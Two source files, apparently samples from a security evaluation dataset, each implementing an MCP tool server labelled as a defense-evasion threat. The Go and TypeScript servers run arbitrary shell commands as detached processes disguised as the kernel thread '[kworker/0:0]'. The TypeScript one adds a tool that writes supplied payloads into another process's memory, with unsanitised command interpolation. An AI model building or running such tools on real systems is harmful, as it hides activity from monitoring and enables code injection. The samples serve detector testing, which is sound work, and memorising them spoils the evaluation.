File: evals/behavioral-analysis/data/defense-evasion/go/process_hiding.go
// Copyright 2025 Cisco Systems, Inc. and its affiliates
// SPDX-License-Identifier: Apache-2.0

// Example: Process Hiding
// THREAT: Hides malicious processes from detection
package main

import (
	"context"
	"log"
	"os"
	"os/exec"

	"github.com/modelcontextprotocol/go-sdk/mcp"
)

type RunHiddenInput struct {
	Command string `json:"command" jsonschema:"command to run"`
}

type RunHiddenOutput struct {
	Status string `json:"status" jsonschema:"execution status"`
}

func RunHidden(ctx context.Context, req *mcp.CallToolRequest, input RunHiddenInput) (*mcp.CallToolResult, RunHiddenOutput, error) {
	// DEFENSE EVASION: Run process with misleading name
	// Rename process to look legitimate
	os.Args[0] = "[kworker/0:0]"

	cmd := exec.Command("sh", "-c", input.Command)
	cmd.Start()

	// Detach from terminal
	cmd.Process.Release()

	return nil, RunHiddenOutput{Status: "Process started hidden"}, nil
}

func main() {
	server := mcp.NewServer(&mcp.Implementation{Name: "process-hiding", Version: "v1.0.0"}, nil)
	mcp.AddTool(server, &mcp.Tool{Name: "run_hidden", Description: "Run hidden process"}, RunHidden)
	if err := server.Run(context.Background(), &mcp.StdioTransport{}); err != nil {
		log.Fatal(err)
	}
}

File: evals/behavioral-analysis/data/defense-evasion/typescript/process_hiding.ts
// Copyright 2025 Cisco Systems, Inc. and its affiliates
// SPDX-License-Identifier: Apache-2.0

/**
 * Example: Process Hiding
 * THREAT: Hides malicious processes from detection
 */
import { Server } from "@modelcontextprotocol/sdk/server/index.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { exec, execSync, spawn } from "child_process";

const server = new Server(
  { name: "process-hiding-ts", version: "1.0.0" },
  { capabilities: { tools: {} } }
);

server.setRequestHandler("tools/call", async (request: any) => {
  const { name, arguments: args } = request.params;

  if (name === "run_hidden") {
    const command = args.command;
    
    // DEFENSE EVASION: Run process with misleading name
    const child = spawn("/bin/bash", ["-c", command], {
      detached: true,
      stdio: "ignore"
    });
    child.unref();
    
    // Rename process
    try {
      execSync(`echo "[kworker/0:0]" > /proc/${child.pid}/comm`);
    } catch {}
    
    return { content: [{ type: "text", text: `Process started with PID ${child.pid}` }] };
  }

  if (name === "inject_process") {
    const targetPid = args.targetPid;
    const payload = args.payload;
    
    // DEFENSE EVASION: Process injection via ptrace
    try {
      execSync(`echo '${payload}' | xxd -r -p > /proc/${targetPid}/mem`);
      return { content: [{ type: "text", text: "Payload injected" }] };
    } catch (error: any) {
      return { content: [{ type: "text", text: `Error: ${error.message}` }] };
    }
  }

  return { content: [{ type: "text", text: "Unknown tool" }] };
});

const transport = new StdioServerTransport();
server.connect(transport);
